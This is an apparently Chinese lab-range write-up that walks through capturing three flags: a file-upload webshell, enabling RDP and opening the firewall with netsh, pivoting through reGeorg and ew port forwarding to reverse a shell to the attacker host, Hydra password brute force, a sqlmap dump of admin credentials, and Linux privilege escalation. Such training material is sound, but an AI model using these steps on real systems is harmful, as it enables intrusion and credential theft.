第二次实验靶场练习笔记
实验要求
找出靶场中的3个flag
实验环境
-
靶机下载地址:https://pan.baidu.com/s/17KNdgTOBStnfE0MEYPP6lQ 提取码:0u6b
-
配置环境:
设置win2003 网卡为nat ;物理机Adapter for VMnet8设置为100网段 -
外网机器ip为192.168.100.130。
实验开始
浏览器打开192.168.100.130,进入网站
文件上传漏洞
- 文件上传漏洞地址:http://192.168.100.130/admin/include/uploadify.php
为了便于利用把他写成一个html文件
- 编写完成后用浏览器打开上传一句话木马
- 上传完成使用菜刀连接
- 拿到webshell,查看目前的权限
- 权限足够,直接上传工具获取密码,步骤同第一次实验笔记
MD5解析后得到密码为a1b2c3 - 查看远程开放端口是否开启
没有开启,命令行开启3389
- 这时拿上刚才的密码远程连接,发现这时还是连不上
猜测可能是防火墙的原因,命令行输入netsh firewall set portopening TCP 3389 ENABLE 使防火墙放行3389
连接完成后在桌面上有第一个flag
爆破进入内网
进入外网机器后打开浏览器翻阅浏览历史,发现两个网址
尝试连接发现账号名称但没有密码,还需要爆破出密码
利用菜刀上传端口转发所需文件到外网机器
为了方便使用修改名字为1.php,在web端运行这个文件
保留下地址备用。
打开kali,修改kali中代理工具的默认配置文件,
运行reGeorg-master工具中的python文件
代理完成,开启九头蛇爆破出密码
得到密码123456,回到外网机器打开浏览器登陆ftp://10.200.1.15,发现第二个flag
sql注入,端口反弹,linux提权
登陆上ftp后发现是网站源代码,经过简单的审计后发现可能存在sql注入的地址
地址:http://10.200.1.16/message.php?id=1
手动测出注入方式为联合查询注入,显示位为2,使用proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -D my_oa -T admin -C password,username --dump找到账号密码
然后拿着账号密码登陆在源代码里发现的OA系统
![在这里插入图片描述](https://img-blog.csdnimg.cn/2019112522504739.png
登陆后就是文件上传漏洞,上传大马
上传大马后先用物理机监听5555端口
然后上传ew到外网机上,输入ew_for_Win.exe -s lcx_tran -l 4444 -f 192.168.100.1 -g 5555进行端口转发
再利用大马反弹端口到物理机
这是完成端口转发,再查看自身当前权限,发现还需要提权,通过大马上传对应的exp。还需要修改上传的exp的权限为可读可写可执行
提权完成后进入root目录下发现第三个flag